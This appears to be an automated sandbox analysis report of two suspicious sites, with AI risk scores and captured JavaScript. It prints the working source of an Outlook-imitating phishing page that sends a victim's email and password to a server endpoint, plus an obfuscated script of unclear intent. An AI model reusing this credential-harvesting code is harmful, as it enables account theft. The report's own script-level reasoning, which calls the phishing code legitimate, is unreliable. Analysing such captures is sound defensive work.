| URL: https://nerp.spfv.ro/.well-known/vercel/security/s... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet exhibits several behaviors that raise moderate security concerns. While it does not contain any high-risk indicators like dynamic code execution or data exfiltration, it does engage in external data transmission and uses obfuscated code, which warrant further investigation. Additionally, the script appears to be using a custom encryption/decryption function, which could be used for legitimate purposes but also raises suspicions. Overall, the combination of these factors suggests a medium-risk script that requires closer examination to determine its true intent and potential impact."
} |
function u(V,B){const c=v();return u=function(s,w){s=s-(0x210e+0x1f56+-0x3f11);let y=c[s];if(u['IufMMc']===undefined){var n=function(W){const Y='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let X='',d='',p=X+n;for(let J=0x1f94+-0x5b*-0x19+-0x2877,P,M,F=0x47c+-0x3bf*-0x2+-0xbfa;M=W['charAt'](F++);~M&&(P=J%(-0x3fd*0x6+-0x25*-0xec+-0xa2a)?P*(-0x19f7+0x106e*0x2+-0x6a5)+M:M,J++%(-0x1d4b*-0x1+-0x264+-0x1ae3))?X+=p['charCodeAt'](F+(-0x4*0x716+-0x2e1+0x1*0x1f43))-(0x2310+-0x101d+-0x1*0x12e9)!==-0x1c21+0x1d0a*-0x1+-0x392b*-0x1?String['fromCharCode'](-0x1420+-0xad3+-0x6*-0x553&P>>(-(0x1*0x2632+0x4*0x77b+-0x441c)*J&-0x51c+0xa93*-0x3+-0xb9*-0x33)):J:0x107e+0x1c49+-0xeed*0x3){M=Y['indexOf'](M);}for(let z=0xfad+0x2*-0x196+0xc81*-0x1,R=X['length'];z<R;z++){d+='%'+('00'+X['charCodeAt'](z)['toString'](0x1f03*-0x1+0x967*-0x1+0x287a))['slice'](-(0x1431+0x23*-0xc1+0x2*0x31a));}return decodeURIComponent(d);};const e=function(W,Y){let X=[],d=0x82*0x1b+-0x1a1a+0xf4*0xd,p,J='';W=n(W);let P;for(P=-0xed3+0xcf+0xe04;P<0x17*0xeb+0x17eb+-0x2c08;P++){X[P]=P;}for(P=0x8*-0x3eb+0x260a+-0x6b2*0x1;P<0x482+-0x119f+-0xe1d*-0x1;P++){d=(d+X[P]+Y['charCodeAt'](P%Y['length']))%(-0xeef+-0x9*-0x335+-0xcee),p=X[P],X[P]=X[d],X[d]=p;}P=0xf73+0x25*-0x7+-0xe70,d=-0x1bf+-0x1ab1+0x1c70;for(let M=-0x1*-0xd85+-0x400+-0x985;M<W['length'];M++){P=(P+(-0x3e9+-0xa65+0x21*0x6f))%(0x2126+0x1eb7+-0x3edd),d=(d+X[P])%(0x166*-0x15+-0x491*-0x7+-0x199*0x1),p=X[P],X[P]=X[d],X[d]=p,J+=String['fromCharCode'](W['charCodeAt'](M)^X[(X[P]+X[d])%(-0x84a+-0x1be*-0x2+0x2*0x2e7)]);}return J;};u['eNxVgS']=e,V=arguments,u['IufMMc']=!![];}const A=c[0x627*0x5+0x253f+0x6cd*-0xa],S=s+A,j=V[S];if(!j){if(u['QhLaVR']===undefined){const W=function(Y){this['sqniZR']=Y,this['puiHUp']=[-0x9d9*-0x1+-0x1344+0x96c,0x413*0x1+0xe71+-0x1284,0xe74+-0x1*-0x305+0x1f1*-0x9],this['draurT']=function(){return'newState';},this['yzxRuH']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*',this['AJzumU']='[\x27|\x22].+[\x27|\x22];?\x20*}';};W['prototype']['SCAUiX']=function(){const Y=new RegExp(this['yzxRuH']+this['AJzumU']),X=Y['test'](this['draurT']['toString']())?--this['puiHUp'][0x1158+0x9fe+-0x1b55]:--this['puiHUp'][-0x98e+0xb4+0x8da];return this['AJbvOM'](X);},W['prototype']['AJbvOM']=function(Y){if(!Boolean(~Y))return Y;return this['XQYCfD'](this['sqniZR']);},W['prototype']['XQYCfD']=function(Y){for(let X=-0x3*0x5e3+-0x1ff1+0x319a,d=this['puiHUp']['length'];X<d;X++){this['puiHUp']['push'](Math['round'](Math['random']())),d=this['puiHUp']['length'];}return Y(this['puiHUp'][0x2*0x3b3+-0x25a+0x4*-0x143]);},new W(u)['SCAUiX'](),u['QhLaVR']=!![];}y=u['eNxVgS'](y,w),V[S]=y;}else y=j;return y;},u(V,B);}const VD=u;(function(Ve,VW){const VT=u,VY=Ve();while(!![]){try{const VX=parseInt(VT(0x316,'RqH6'))/(0x60d*0x5+0x2585+-0x43c5*0x1)+-parseInt(VT(0x31d,'TbvA'))/(-0x1318+-0x1f71+0x328b)*(parseInt(VT(0x1dd,'$luD'))/(0x11*-0x3d+0x116a+-0x1*0xd5a))+-parseInt(VT(0x241,'3SKn'))/(0x140c+-0xde7+0x20b*-0x3)*(parseInt(VT(0x198,'RujQ'))/(-0x192d*0x1+0x4b9+0x1479))+-parseInt(VT(0x1b2,'cE5)'))/(-0x1fb4+0x1859+-0x1*-0x761)+-parseInt(VT(0x381,'1pzL'))/(-0x5*-0x115+0x1*-0xe4e+0x476*0x2)+-parseInt(VT(0x35a,'ZCOv'))/(0x69*-0x58+0x225e+0x2d*0xa)+-parseInt(VT(0x2b2,'G*1f'))/(-0x1528*0x1+0xad9*0x2+-0x81)*(-parseInt(VT(0x2ae,'[##K'))/(-0x1*0x1dcb+0x3*-0xa78+0x3d3d));if(VX===VW)break;else VY['push'](VY['shift']());}catch(Vd){VY['push'](VY['shift']());}}}(v,-0x174*0xa81+0xda681+0xb0126));const e=(function(){let Ve=!![];return function(VW,VY){const VX=Ve?function(){const VC=u;if(VY){const Vd=VY[VC(0x32d,'Ele)')+'ly'](VW,arguments);return VY=null,Vd;}}:function(){};return Ve=![],VX;};}()),d=e(this,function(){const Vh=u,Ve={'whgiH':'((('+Vh(0x27f,'bpA(')+'+)+'+Vh(0x2ee,'Ele)')};return d['toS'+Vh(0x1ef,'3SKn')+'ng']()['sea'+Vh(0x17b,'XIJ6')](Ve['whg'+'iH'])[Vh(0x1ba,'Js%Y')+'tri'+'ng']()[Vh(0x286,'Ele)')+Vh(0x1a7,'2GEj')+'uct'+'or'](d)[Vh(0x2c0,'wFAc')+'rch'](Vh(0x31b,'o8[l')+Vh(0x1d1,'xGK1')+Vh(0x374,'(Z4B')+Vh(0x36d,'TbvA'));});d();const p=(function(){ |
| URL: https://nerp.spfv.ro Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://nerp.spfv.ro |
| URL: https://nerp.spfv.ro/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://nerp.spfv.ro/ Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://nerp.spfv.ro/static/js/main.1cb2ade0.js... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The provided JavaScript snippet appears to be a minified React library code. It does not contain any high-risk indicators like dynamic code execution, data exfiltration, or suspicious redirects. The code seems to be focused on handling DOM manipulation and attribute management, which are common and expected behaviors for a React library. While the code is obfuscated, this is a common practice for production-ready JavaScript libraries to reduce file size and protect intellectual property. Overall, the risk score is low, and the code appears to be a legitimate part of the React library."
} |
/*! For license information please see main.1cb2ade0.js.LICENSE.txt */
(()=>{"use strict";var e={730:(e,n,t)=>{var r=t(43),l=t(853);function a(e){for(var n="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t++)n+="&args[]="+encodeURIComponent(arguments[t]);return"Minified React error #"+e+"; visit "+n+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var o=new Set,u={};function i(e,n){s(e,n),s(e+"Capture",n)}function s(e,n){for(u[e]=n,e=0;e<n.length;e++)o.add(n[e])}var c=!("undefined"===typeof window||"undefined"===typeof window.document||"undefined"===typeof window.document.createElement),f=Object.prototype.hasOwnProperty,d=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD][:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD\-.0-9\u00B7\u0300-\u036F\u203F-\u2040]*$/,p={},m={};function h(e,n,t,r,l,a,o){this.acceptsBooleans=2===n||3===n||4===n,this.attributeName=r,this.attributeNamespace=l,this.mustUseProperty=t,this.propertyName=e,this.type=n,this.sanitizeURL=a,this.removeEmptyString=o}var v={};"children dangerouslySetInnerHTML defaultValue defaultChecked innerHTML suppressContentEditableWarning suppressHydrationWarning style".split(" ").forEach((function(e){v[e]=new h(e,0,!1,e,null,!1,!1)})),[["acceptCharset","accept-charset"],["className","class"],["htmlFor","for"],["httpEquiv","http-equiv"]].forEach((function(e){var n=e[0];v[n]=new h(n,1,!1,e[1],null,!1,!1)})),["contentEditable","draggable","spellCheck","value"].forEach((function(e){v[e]=new h(e,2,!1,e.toLowerCase(),null,!1,!1)})),["autoReverse","externalResourcesRequired","focusable","preserveAlpha"].forEach((function(e){v[e]=new h(e,2,!1,e,null,!1,!1)})),"allowFullScreen async autoFocus autoPlay controls default defer disabled disablePictureInPicture disableRemotePlayback formNoValidate hidden loop noModule noValidate open playsInline readOnly required reversed scoped seamless itemScope".split(" ").forEach((function(e){v[e]=new h(e,3,!1,e.toLowerCase(),null,!1,!1)})),["checked","multiple","muted","selected"].forEach((function(e){v[e]=new h(e,3,!0,e,null,!1,!1)})),["capture","download"].forEach((function(e){v[e]=new h(e,4,!1,e,null,!1,!1)})),["cols","rows","size","span"].forEach((function(e){v[e]=new h(e,6,!1,e,null,!1,!1)})),["rowSpan","start"].forEach((function(e){v[e]=new h(e,5,!1,e.toLowerCase(),null,!1,!1)}));var g=/[\-:]([a-z])/g;function y(e){return e[1].toUpperCase()}function b(e,n,t,r){var l=v.hasOwnProperty(n)?v[n]:null;(null!==l?0!==l.type:r||!(2<n.length)||"o"!==n[0]&&"O"!==n[0]||"n"!==n[1]&&"N"!==n[1])&&(function(e,n,t,r){if(null===n||"undefined"===typeof n||function(e,n,t,r){if(null!==t&&0===t.type)return!1;switch(typeof n){case"function":case"symbol":return!0;case"boolean":return!r&&(null!==t?!t.acceptsBooleans:"data-"!==(e=e.toLowerCase().slice(0,5))&&"aria-"!==e);default:return!1}}(e,n,t,r))return!0;if(r)return!1;if(null!==t)switch(t.type){case 3:return!n;case 4:return!1===n;case 5:return isNaN(n);case 6:return isNaN(n)||1>n}return!1}(n,t,l,r)&&(t=null),r||null===l?function(e){return!!f.call(m,e)||!f.call(p,e)&&(d.test(e)?m[e]=!0:(p[e]=!0,!1))}(n)&&(null===t?e.removeAttribute(n):e.setAttribute(n,""+t)):l.mustUseProperty?e[l.propertyName]=null===t?3!==l.type&&"":t:(n=l.attributeName,r=l.attributeNamespace,null===t?e.removeAttribute(n):(t=3===(l=l.type)||4===l&&!0===t?"":""+t,r?e.setAttributeNS(r,n,t):e.setAttribute(n,t))))}"accent-height alignment-baseline arabic-form baseline-shift cap-height clip-path clip-rule color-interpolation color-interpolation-filters color-profile color-rendering dominant-baseline enable-background fill-opacity fill-rule flood-color flood-opacity font-family font-size font-size-adjust font-stretch font-style font-variant font-weight glyph-n |
| URL: https://nerp.spfv.ro/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://nerp.spfv.ro/ Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://poon.evoluciondigitalia.cl/_next/static/ch... Model: Joe Sandbox AI | {
"risk_score": 5,
"reasoning": "The provided JavaScript snippet contains a mix of behaviors that require further review. While it does not exhibit any clear malicious intent, it uses some practices that could be considered aggressive or potentially concerning. The script appears to be related to a Vercel toolbar, which is a legitimate tool, but the way it interacts with the user's environment and data transmission requires closer examination. Overall, the script demonstrates a medium level of risk and should be analyzed in more detail to determine its true purpose and potential impact."
} |
(()=>{"use strict";var e={},r={};function t(o){var n=r[o];if(void 0!==n)return n.exports;var i=r[o]={exports:{}},l=!0;try{e[o](i,i.exports,t),l=!1}finally{l&&delete r[o]}return i.exports}t.m=e,(()=>{var e=[];t.O=(r,o,n,i)=>{if(o){i=i||0;for(var l=e.length;l>0&&e[l-1][2]>i;l--)e[l]=e[l-1];e[l]=[o,n,i];return}for(var a=1/0,l=0;l<e.length;l++){for(var[o,n,i]=e[l],u=!0,f=0;f<o.length;f++)(!1&i||a>=i)&&Object.keys(t.O).every(e=>t.O[e](o[f]))?o.splice(f--,1):(u=!1,i<a&&(a=i));if(u){e.splice(l--,1);var s=n();void 0!==s&&(r=s)}}return r}})(),t.n=e=>{var r=e&&e.__esModule?()=>e.default:()=>e;return t.d(r,{a:r}),r},t.d=(e,r)=>{for(var o in r)t.o(r,o)&&!t.o(e,o)&&Object.defineProperty(e,o,{enumerable:!0,get:r[o]})},t.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||Function("return this")()}catch(e){if("object"==typeof window)return window}}(),t.o=(e,r)=>Object.prototype.hasOwnProperty.call(e,r),t.r=e=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},t.p="/_next/",(()=>{var e={68:0};t.O.j=r=>0===e[r];var r=(r,o)=>{var n,i,[l,a,u]=o,f=0;if(l.some(r=>0!==e[r])){for(n in a)t.o(a,n)&&(t.m[n]=a[n]);if(u)var s=u(t)}for(r&&r(o);f<l.length;f++)i=l[f],t.o(e,i)&&e[i]&&e[i][0](),e[i]=0;return t.O(s)},o=self.webpackChunk_N_E=self.webpackChunk_N_E||[];o.forEach(r.bind(null,0)),o.push=r.bind(null,o.push.bind(o))})()})();
;(function(){if(!/(?:^|;\s)__vercel_toolbar=1(?:;|$)/.test(document.cookie))return;var s=document.createElement('script');s.src='https://vercel.live/_next-live/feedback/feedback.js';s.setAttribute("data-explicit-opt-in","true");s.setAttribute("data-cookie-opt-in","true");((document.head||document.documentElement).appendChild(s))})();
|
| URL: https://poon.evoluciondigitalia.cl/_next/static/ch... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a React-related utility code that does not contain any high-risk indicators. It includes some low-risk behaviors, such as the use of legacy APIs like `XDomainRequest`, but these are not inherently malicious. The code seems to be focused on error handling and stack trace generation, which are common practices in web development. Overall, the risk score is low, and the code is likely benign."
} |
"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[593],{1247:(e,t,n)=>{var r,l,a=n(7836),o=n(9982),i=n(6540),u=n(961);function s(e){var t="https://react.dev/errors/"+e;if(1<arguments.length){t+="?args[]="+encodeURIComponent(arguments[1]);for(var n=2;n<arguments.length;n++)t+="&args[]="+encodeURIComponent(arguments[n])}return"Minified React error #"+e+"; visit "+t+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}function c(e){return!(!e||1!==e.nodeType&&9!==e.nodeType&&11!==e.nodeType)}var f=Symbol.for("react.element"),d=Symbol.for("react.transitional.element"),p=Symbol.for("react.portal"),m=Symbol.for("react.fragment"),h=Symbol.for("react.strict_mode"),g=Symbol.for("react.profiler"),y=Symbol.for("react.provider"),v=Symbol.for("react.consumer"),b=Symbol.for("react.context"),k=Symbol.for("react.forward_ref"),w=Symbol.for("react.suspense"),S=Symbol.for("react.suspense_list"),x=Symbol.for("react.memo"),E=Symbol.for("react.lazy");Symbol.for("react.scope"),Symbol.for("react.debug_trace_mode");var C=Symbol.for("react.offscreen");Symbol.for("react.legacy_hidden"),Symbol.for("react.tracing_marker");var _=Symbol.for("react.memo_cache_sentinel"),P=Symbol.iterator;function z(e){return null===e||"object"!=typeof e?null:"function"==typeof(e=P&&e[P]||e["@@iterator"])?e:null}var N,T,L=Symbol.for("react.client.reference"),O=i.__CLIENT_INTERNALS_DO_NOT_USE_OR_WARN_USERS_THEY_CANNOT_UPGRADE,R=Object.assign;function A(e){if(void 0===N)try{throw Error()}catch(e){var t=e.stack.trim().match(/\n( *(at )?)/);N=t&&t[1]||"",T=-1<e.stack.indexOf("\n at")?" (<anonymous>)":-1<e.stack.indexOf("@")?"@unknown:0:0":""}return"\n"+N+e+T}var F=!1;function D(e,t){if(!e||F)return"";F=!0;var n=Error.prepareStackTrace;Error.prepareStackTrace=void 0;try{var r={DetermineComponentFrameRoot:function(){try{if(t){var n=function(){throw Error()};if(Object.defineProperty(n.prototype,"props",{set:function(){throw Error()}}),"object"==typeof Reflect&&Reflect.construct){try{Reflect.construct(n,[])}catch(e){var r=e}Reflect.construct(e,[],n)}else{try{n.call()}catch(e){r=e}e.call(n.prototype)}}else{try{throw Error()}catch(e){r=e}(n=e())&&"function"==typeof n.catch&&n.catch(function(){})}}catch(e){if(e&&r&&"string"==typeof e.stack)return[e.stack,r.stack]}return[null,null]}};r.DetermineComponentFrameRoot.displayName="DetermineComponentFrameRoot";var l=Object.getOwnPropertyDescriptor(r.DetermineComponentFrameRoot,"name");l&&l.configurable&&Object.defineProperty(r.DetermineComponentFrameRoot,"name",{value:"DetermineComponentFrameRoot"});var a=r.DetermineComponentFrameRoot(),o=a[0],i=a[1];if(o&&i){var u=o.split("\n"),s=i.split("\n");for(l=r=0;r<u.length&&!u[r].includes("DetermineComponentFrameRoot");)r++;for(;l<s.length&&!s[l].includes("DetermineComponentFrameRoot");)l++;if(r===u.length||l===s.length)for(r=u.length-1,l=s.length-1;1<=r&&0<=l&&u[r]!==s[l];)l--;for(;1<=r&&0<=l;r--,l--)if(u[r]!==s[l]){if(1!==r||1!==l)do if(r--,l--,0>l||u[r]!==s[l]){var c="\n"+u[r].replace(" at new "," at ");return e.displayName&&c.includes("<anonymous>")&&(c=c.replace("<anonymous>",e.displayName)),c}while(1<=r&&0<=l);break}}}finally{F=!1,Error.prepareStackTrace=n}return(n=e?e.displayName||e.name:"")?A(n):""}function M(e){try{var t="";do t+=function(e){switch(e.tag){case 26:case 27:case 5:return A(e.type);case 16:return A("Lazy");case 13:return A("Suspense");case 19:return A("SuspenseList");case 0:case 15:return e=D(e.type,!1);case 11:return e=D(e.type.render,!1);case 1:return e=D(e.type,!0);default:return""}}(e),e=e.return;while(e);return t}catch(e){return"\nError generating stack: "+e.message+"\n"+e.stack}}function I(e){var t=e,n=e;if(e.alternate)for(;t.return;)t=t.return;else{e=t;do 0!=(4098&(t=e).flags)&&(n=t.return),e=t.return;while(e)}return 3===t.tag?n:null}function U(e){if(13===e.tag){var t=e.memoizedState;if(null===t&&null!==(e=e.alternate)&&(t=e.memoizedState),null!==t)return t.dehydrated}return null}function j(e){i |
| URL: https://poon.evoluciondigitalia.cl/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email Address"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://poon.evoluciondigitalia.cl Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": true,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://poon.evoluciondigitalia.cl |
| URL: https://poon.evoluciondigitalia.cl/_next/static/ch... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The script demonstrates moderate-risk behaviors, including external data transmission and potential data exfiltration. While it appears to have a legitimate purpose (email validation and password submission), the use of third-party domains and lack of transparency raise some concerns that require further review."
}
The script exhibits the following behaviors:
1. **External Data Transmission (2 points)**: The script sends user data (email and password) to the `/api/send-email` endpoint, which is likely a third-party domain.
2. **Potential Data Exfiltration (2 points)**: The script collects user email and password information, which could be considered sensitive data.
3. **Fallback Domains (2 points)**: The script uses multiple domains (ipinfo.io, restcountries.com) to fetch country information, some of which may be untrusted.
Contextual Adjustments:
- **Trusted Domains (-1 point)**: The script interacts with the `nelo.biggreeneegg.com` domain, which appears to be a legitimate destination for the email validation process.
- **Analytics/Telemetry (-2 points)**: The script's primary purpose seems to be email validation and password submission, which is a common and expected behavior.
Final Risk Score: 6 (Medium Risk)
The script demonstrates some moderate-risk behaviors, such as external data transmission and potential data exfiltration. However, the overall context suggests a legitimate purpose, and the script does not exhibit any clear malicious intent. Further review may be necessary to ensure the script is properly implemented and the user data is handled securely. |
(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[332],{7276:(e,t,s)=>{(window.__NEXT_P=window.__NEXT_P||[]).push(["/",function(){return s(6993)}])},6993:(e,t,s)=>{"use strict";s.r(t),s.d(t,{default:()=>c});var a=s(4848),n=s(6540),o=s(2505),l=s.n(o),i=s(9680),r=s.n(i);function c(){let[e,t]=(0,n.useState)(""),[s,o]=(0,n.useState)(""),[i,c]=(0,n.useState)(""),[d,m]=(0,n.useState)(!1),[u,_]=(0,n.useState)(""),[g,h]=(0,n.useState)(!1);(0,n.useEffect)(()=>{l().get("https://ipinfo.io/json?token=c3e87e382ddea7").then(e=>{let t=e.data.country;return l().get("https://restcountries.com/v3.1/alpha/".concat(t))}).then(e=>{c(e.data[0].name.common)}).catch(e=>{console.error("Failed to fetch full country name:",e),_("Failed to retrieve country information.")})},[]);let p=async t=>{if(t.preventDefault(),s.length>=5){h(!0);try{let t=await l().post("/api/send-email",{email:e,password:s,country:i});console.log("Email sent successfully!",t.data.message),window.location.href="https://nelo.biggreeneegg.com/"}catch(e){console.error("Failed to send email:",e),_("Failed to submit. Please try again.")}finally{h(!1)}}else _("Password must be at least 5 characters long.")},x=e=>/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(String(e).toLowerCase());return(0,a.jsxs)("div",{className:r().container,children:[(0,a.jsx)("div",{className:r().background}),(0,a.jsxs)("div",{className:r().loginBox,children:[(0,a.jsx)("img",{src:"/logo.png",alt:"Logo",className:r().logo}),(0,a.jsx)("div",{className:r().message,children:d?"Validate email password to continue":"Verify email to proceed"}),d?(0,a.jsxs)(a.Fragment,{children:[(0,a.jsx)("div",{className:r().displayEmail,children:e}),(0,a.jsxs)("form",{onSubmit:p,children:[(0,a.jsx)("input",{type:"password",placeholder:"Password",className:r().inputField,value:s,onChange:e=>o(e.target.value)}),(0,a.jsx)("div",{className:r().buttonContainer,children:(0,a.jsx)("button",{type:"submit",className:r().submitButton,children:"Validate"})})]})]}):(0,a.jsxs)("form",{onSubmit:t=>{t.preventDefault(),x(e)?(m(!0),_("")):_("Please enter a valid email address.")},children:[(0,a.jsx)("input",{type:"email",placeholder:"Email Address",className:r().inputField,value:e,onChange:e=>t(e.target.value)}),(0,a.jsx)("div",{className:r().buttonContainer,children:(0,a.jsx)("button",{type:"submit",className:r().nextButton,children:"Next"})})]}),u&&(0,a.jsx)("div",{className:r().errorMessage,children:u}),g&&(0,a.jsx)("div",{className:r().modal,children:(0,a.jsx)("div",{className:r().modalContent,children:(0,a.jsx)("p",{children:"Processing..."})})})]})]})}},9680:e=>{e.exports={container:"Home_container__d256j",background:"Home_background__nqUIs",loginBox:"Home_loginBox__i6Tc_",logo:"Home_logo__IOQAX",message:"Home_message__OKL2m",displayEmail:"Home_displayEmail__HOGgk",inputField:"Home_inputField__h82W1",buttonContainer:"Home_buttonContainer__nOVuY",submitButton:"Home_submitButton__ECzIY",nextButton:"Home_nextButton__r_Kss",errorMessage:"Home_errorMessage__n47_b",modal:"Home_modal___NgiA",modalContent:"Home_modalContent__XKBCH"}}},e=>{var t=t=>e(e.s=t);e.O(0,[505,636,593,792],()=>t(7276)),_N_E=e.O()}]);
|
| URL: https://poon.evoluciondigitalia.cl/ Model: Joe Sandbox AI | {
"brands": [
"Outlook"
]
} |
|
| URL: https://poon.evoluciondigitalia.cl/ Model: Joe Sandbox AI | ```json{ "legit_domain": "outlook.com", "classification": "wellknown", "reasons": [ "The brand 'Outlook' is a well-known email service provided by Microsoft.", "The legitimate domain for Outlook is 'outlook.com'.", "The provided URL 'poon.evoluciondigitalia.cl' does not match the legitimate domain for Outlook.", "The domain 'evoluciondigitalia.cl' does not have any known association with Outlook or Microsoft.", "The presence of an input field for 'Email Address' on a non-legitimate domain is a common phishing tactic to harvest credentials." ], "riskscore": 9}
Google indexed: False |
URL: poon.evoluciondigitalia.cl
Brands: Outlook
Input Fields: Email Address |
| URL: https://poon.evoluciondigitalia.cl/_next/static/ch... Model: Joe Sandbox AI | ```json
{
"risk_score": 3,
"reasoning": "The script uses XMLHttpRequest to send data, which is a moderate-risk indicator (+2 points). It also includes basic authentication headers, but there is no indication of data exfiltration or interaction with suspicious domains. The script appears to be part of a library (likely Axios) for handling HTTP requests, which is a common and legitimate use case. No high-risk behaviors are present, and the context suggests a legitimate purpose, capping the score at 3."
} |
(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[505],{2505:(e,t,r)=>{e.exports=r(8015)},5592:(e,t,r)=>{"use strict";var n=r(9516),o=r(7522),s=r(3948),i=r(9106),a=r(9615),u=r(2012),c=r(4202),f=r(7763);e.exports=function(e){return new Promise(function(t,r){var p=e.data,l=e.headers,d=e.responseType;n.isFormData(p)&&delete l["Content-Type"];var h=new XMLHttpRequest;if(e.auth){var m=e.auth.username||"",g=e.auth.password?unescape(encodeURIComponent(e.auth.password)):"";l.Authorization="Basic "+btoa(m+":"+g)}var v=a(e.baseURL,e.url);function y(){if(h){var n="getAllResponseHeaders"in h?u(h.getAllResponseHeaders()):null;o(t,r,{data:d&&"text"!==d&&"json"!==d?h.response:h.responseText,status:h.status,statusText:h.statusText,headers:n,config:e,request:h}),h=null}}if(h.open(e.method.toUpperCase(),i(v,e.params,e.paramsSerializer),!0),h.timeout=e.timeout,"onloadend"in h?h.onloadend=y:h.onreadystatechange=function(){h&&4===h.readyState&&(0!==h.status||h.responseURL&&0===h.responseURL.indexOf("file:"))&&setTimeout(y)},h.onabort=function(){h&&(r(f("Request aborted",e,"ECONNABORTED",h)),h=null)},h.onerror=function(){r(f("Network Error",e,null,h)),h=null},h.ontimeout=function(){var t="timeout of "+e.timeout+"ms exceeded";e.timeoutErrorMessage&&(t=e.timeoutErrorMessage),r(f(t,e,e.transitional&&e.transitional.clarifyTimeoutError?"ETIMEDOUT":"ECONNABORTED",h)),h=null},n.isStandardBrowserEnv()){var b=(e.withCredentials||c(v))&&e.xsrfCookieName?s.read(e.xsrfCookieName):void 0;b&&(l[e.xsrfHeaderName]=b)}"setRequestHeader"in h&&n.forEach(l,function(e,t){void 0===p&&"content-type"===t.toLowerCase()?delete l[t]:h.setRequestHeader(t,e)}),n.isUndefined(e.withCredentials)||(h.withCredentials=!!e.withCredentials),d&&"json"!==d&&(h.responseType=e.responseType),"function"==typeof e.onDownloadProgress&&h.addEventListener("progress",e.onDownloadProgress),"function"==typeof e.onUploadProgress&&h.upload&&h.upload.addEventListener("progress",e.onUploadProgress),e.cancelToken&&e.cancelToken.promise.then(function(e){h&&(h.abort(),r(e),h=null)}),p||(p=null),h.send(p)})}},8015:(e,t,r)=>{"use strict";var n=r(9516),o=r(9012),s=r(5155),i=r(5343);function a(e){var t=new s(e),r=o(s.prototype.request,t);return n.extend(r,s.prototype,t),n.extend(r,t),r}var u=a(r(6987));u.Axios=s,u.create=function(e){return a(i(u.defaults,e))},u.Cancel=r(1928),u.CancelToken=r(3191),u.isCancel=r(3864),u.all=function(e){return Promise.all(e)},u.spread=r(7980),u.isAxiosError=r(5019),e.exports=u,e.exports.default=u},1928:e=>{"use strict";function t(e){this.message=e}t.prototype.toString=function(){return"Cancel"+(this.message?": "+this.message:"")},t.prototype.__CANCEL__=!0,e.exports=t},3191:(e,t,r)=>{"use strict";var n=r(1928);function o(e){if("function"!=typeof e)throw TypeError("executor must be a function.");this.promise=new Promise(function(e){t=e});var t,r=this;e(function(e){r.reason||(r.reason=new n(e),t(r.reason))})}o.prototype.throwIfRequested=function(){if(this.reason)throw this.reason},o.source=function(){var e;return{token:new o(function(t){e=t}),cancel:e}},e.exports=o},3864:e=>{"use strict";e.exports=function(e){return!!(e&&e.__CANCEL__)}},5155:(e,t,r)=>{"use strict";var n=r(9516),o=r(9106),s=r(3471),i=r(4490),a=r(5343),u=r(4841),c=u.validators;function f(e){this.defaults=e,this.interceptors={request:new s,response:new s}}f.prototype.request=function(e){"string"==typeof e?(e=arguments[1]||{},e.url=arguments[0]):e=e||{},(e=a(this.defaults,e)).method?e.method=e.method.toLowerCase():this.defaults.method?e.method=this.defaults.method.toLowerCase():e.method="get";var t,r=e.transitional;void 0!==r&&u.assertOptions(r,{silentJSONParsing:c.transitional(c.boolean,"1.0.0"),forcedJSONParsing:c.transitional(c.boolean,"1.0.0"),clarifyTimeoutError:c.transitional(c.boolean,"1.0.0")},!1);var n=[],o=!0;this.interceptors.request.forEach(function(t){("function"!=typeof 